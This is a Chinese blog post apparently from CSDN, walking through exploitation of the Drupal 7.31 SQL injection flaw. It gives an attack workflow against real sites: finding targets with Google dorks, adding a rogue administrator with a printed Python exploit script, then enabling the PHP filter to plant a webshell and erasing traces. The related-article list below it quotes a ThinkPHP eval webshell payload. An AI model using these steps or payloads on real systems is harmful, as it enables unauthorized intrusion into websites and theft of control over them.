Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)

最新推荐文章于 2023-04-25 15:15:48 发布
最新推荐文章于 2023-04-25 15:15:48 发布
阅读量8.3k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kikaylee/article/details/40400643
版权

       10月16日有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。

       通过测试,我总结了一套完整的利用过程。

      (1)利用google查找潜在的目标,关键字很多啦,比如:inurl:?q=node/等等;

      (2)大概判断一下版本,一般就是查看changelog.txt文件。其实也可以不查看,直接暴力搞,这就稍微没点节操了,哈哈,开个玩笑;

      (3)利用脚本添加登录用户,这个用户是在?q=user/login下登录,进入了Drupal后台;

      以下的步骤就是利用Drupal后台上传webshell了,方法很多啦,这里介绍一种,记得搞完擦痕迹。

     (1)开启php filter功能;

     (2)设置php code编辑内容,保证超级管理员可以使用该模式,并且可以解析php代码;

     (3)利用php code模式新增文章就可以啦。

     就这么多了,不多说了,你懂的。。。

    附上利用代码,下面的代码使用python写的,部分用户可能在运行时出错,这是因为缺少库文件,可以点击打开链接

  

 import urllib2,sys
if len(sys.argv) != 4:
    print ""
    print "python 7.xSQL.py  [url]http://xxoo.com/drupal[/url] admin 123456"
    print ""
    sys.exit(1)
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
insert_user = "name[0%20;set+@a%3d%28SELECT+MAX%28uid%29+FROM+users%29%2b1;INSERT+INTO+users+set+uid%3d@a,status%3d1,name%3d\'" \
            +user \
            +"'+,+pass+%3d+'" \
            +hash[:55] \
            +"';INSERT+INTO+users_roles+set+uid%3d@a,rid%3d3;;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
#print insert_user
content = urllib2.urlopen(url=target, data=insert_user).read()
if "mb_strlen() expects parameter 1" in content:
        print "Success!\nLogin now with user:%s and pass:%s" % (user, password)


   

kikay
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
〖EXP〗Drupal远程代码执行漏洞复现&Ladon批量利用
K8哥哥
08-03 995
漏洞简介 Drupal是一个开源内容管理系统(CMS),全球超过100万个网站(包括政府,电子零售,企业组织,金融机构等)使用。两周前,Drupal安全团队披露了一个非常关键的漏洞,编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤,因此,这使得攻击者可能将恶意注入表单内容,此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。 漏洞分析 https://research.checkpoint.com/uncovering-drupalgeddon-2/ 影响版
detect-exploits:检测Drupal和Wordpress中的常见漏洞利用模式
05-16
一个简单的bash脚本,用于扫描WordPress和Drupal中的漏洞。 依存关系 现代的GNU grep和GNU查找。 安装 make install 用法 detect-exploits [OPTION]... DIR A simple bash script to scan for exploits in ...
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件
10-23
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件 具体利用方法可以参见http://blog.csdn.net/kikaylee/article/details/40400643
Drupal 7.31 SQL注入漏洞
小小猪的博客
11-15 1745
Drupal 7.31 SQL注入漏洞 漏洞详解: Drupal是一个开源内容管理平台,为数百万个网站和应用程序提供支持。 这个漏洞威力确实很大,而且Drupal用的也比较多,使用Fuzzing跑字典应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以也就只是写个Exp不再深入下去。 环境搭建: drupla 下载地址 环境打包在目录下安装即可 中间遇到的问题: 解决方法:关闭extersion=php_mbstring.dll(修改前注意备份原来的) xploit:.
开源框架 Drupal 修复多个访问绕过和 CSRF 漏洞
smellycat000的专栏
09-17 215
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本周三,Drupal 开发人员通知用户称已发布 Drupal 8.9、9.1和9.2版本更新,修复了五个可导致跨站请求伪造 (CSRF)...
Drupal 7.31 SQL注入漏洞利用详解及EXP
热门推荐
Exploit的小站~
05-10 2万+
 有意迟几天放出来这篇文章以及程序,不过看样子Drupal的这个洞没有引起多少重视,所以我也没有必要按着不发了,不过说实话这个洞威力挺大的,当然,这也是Drupal本身没有意料到的。 0x00 首先,这个漏洞真的很大,而且Drupal用的也比较多,应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp。不过,这个洞好像不怎么被重视,这也是极为不合适。...
ThinkPHP及Drupal漏洞合集
小小猪的博客
08-19 620
ThinkPHP漏洞 ThinkPHP2.x远程代码执行漏洞 漏洞复现 使用payload 直接访问,即可执行phpinfo(): http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D 利用漏洞getshell,下面给出一个能够直接蚁剑(菜刀)连接的payload: /index.php?s=a/b/c/${@print(eval($_POST[1]))} ThinkPHP3.2.3 SQL注入漏.
Drupal 7.31 SQL注入分析及POC
Exploit的小站~
05-10 2万+
这个漏洞昨天爆出的,今天才有时间看代码。 在Drupal中,执行sql语句都是使用PDO模型进行的,这样做一般来说是可以规避大多数的注入,因为占位符的使用对sql语句的语法进行了限制。 但是这也不意味着绝对的安全,比如这次的漏洞。 在Drupal的user模块中,找到user.module: $account = db_query("SELECT * FROM {users} WHER...
Drupal漏洞Drupal 7.31 SQL漏洞
2301_77778745的博客
04-25 513
1.通过python调用drupal7.x.py脚本对数据库进行注入。test test(后面两个test是新设的用户名和密码)2.输入命令:python drupal7.x.py。
vulnhub Lampião: 1
箭雨镜屋
07-25 505
渗透思路:nmap扫描发现端口,robots.txt以及Drupal大致版本 ---- 通过CHANGELOG进一步确认Drupal版本 ---- 利用Drupal 7的RCE(CVE-2018-7600)getshell(无需认证)---- 获取python反弹shell ---- 脏牛提权
商业源码-编程源码-Drupal v6.1.zip
06-15
商业源码-编程源码-Drupal v6.1.zip
drupal7源码
02-16
drupal为开发者最好的开源选择。多研究研究
C#,数值计算,解微分方程的龙格-库塔二阶方法与源代码
04-25
C#,数值计算,解微分方程的龙格-库塔二阶方法与源代码 微分方程 含有导数或微分的方程称为微分方程,未知函数为一元函数的微分方程称为常微分方程。 微分方程的阶数 微分方程中导数或微分的最高阶数称为微分方程的阶数。 微分方程的解 使得微分方程成立的函数称为微分方程的解。 微分方程的特解 微分方程的不含任意常数的解称为微分方程的特解。 微分方程的通解 所含相互独立的任意常数的个数与微分方程的阶数相等的微分方程的解称为微分方程的通解。
桌面聊天室
04-25
该毕业设计采用了c/s架构,通过javase中的知识编写完成,系统功能包括:用户注册,用户登录,聊天功能。 对于刚学完java基础的同学来说可以通过该毕业设计加深对所学知识的理解。该系统使用socket进行数据的发送,用户注册登录之后,可以进行多人聊天,功能类似qq群聊。
【前端素材】大数据-交通大屏.zip
最新发布
04-25
大数据技术指的是用于处理和分析大规模数据集的技术和工具。以下是一些常见的大数据技术和工具: Hadoop:Apache Hadoop是一个用于分布式存储和处理大规模数据的开源框架。它包括Hadoop Distributed File System(HDFS)用于数据存储和MapReduce用于数据处理。 Spark:Apache Spark是一个快速、通用的集群计算系统,提供了比MapReduce更快的数据处理能力。它支持内存计算和更多复杂的数据处理流程。 NoSQL数据库:NoSQL数据库(如MongoDB、Cassandra等)则更适用于处理这类数据。 数据仓库:数据仓库是一个用于集成和分析大规模数据的存储系统,一些知名的数据仓库包括Snowflake、Amazon Redshift等。 数据湖:数据湖是一个存储结构化和非结构化数据的存储池,用于支持数据分析和机器学习应用。 机器学习:大数据技术也广泛应用于机器学习领域,支持大规模数据的模型训练和预测分析。 流式处理:针对实时数据处理需求,流式处理技术(如Apache Kafka、Apache Flink)可以实时。
inspect:windows系统下的控件识别工具
04-25
windows系统下的控件识别工具,可用于桌面应用的UI自动化测试
038ssm-jsp-mysql高校毕业生就业满意度调查统计系统.zip(可运行源码+数据库文件+文档)
04-25
高校毕业生就业满意度调查统计系统是以实际运用为开发背景,运用软件工程开发方法,采用jsp技术构建的一个管理系统。整个开发过程首先对软件系统进行需求分析,得出系统的主要功能。接着对系统进行总体设计和详细设计。总体设计主要包括系统总体结构设计、系统数据结构设计、系统功能设计和系统安全设计等;详细设计主要包括模块实现的关键代码,系统数据库访问和主要功能模块的具体实现等。最后对系统进行功能测试,并对测试结果进行分析总结,及时改进系统中存在的不足,为以后的系统维护提供了方便,也为今后开发类似系统提供了借鉴和帮助。 本高校毕业生就业满意度调查统计系统采用的数据库是Mysql,使用JSP技术开发。在设计过程中,充分保证了系统代码的良好可读性、实用性、易扩展性、通用性、便于后期维护、操作方便以及页面简洁等特点。 关键词:高校毕业生就业满意度调查统计系统,JSP技术,Mysql数据库
小程序-58-童心党史小程序-源码.zip
04-25
提供的源码资源涵盖了小程序应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 适合毕业设计、课程设计作业。这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。 所有源码均经过严格测试,可以直接运行,可以放心下载使用。有任何使用问题欢迎随时与博主沟通,第一时间进行解答!
"drupal < 7.32 \"drupalgeddon\" sql injection vulnerability (cve-2014-3704)漏洞"
10-28
Drupal 版本中存在一个名为“Drupalgeddon”的SQL注入漏洞漏洞编号为CVE-...总而言之,对于Drupal 版本的用户,及时升级到最新版本,并采取额外的安全措施,是防止“Drupalgeddon” SQL注入漏洞利用的关键步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值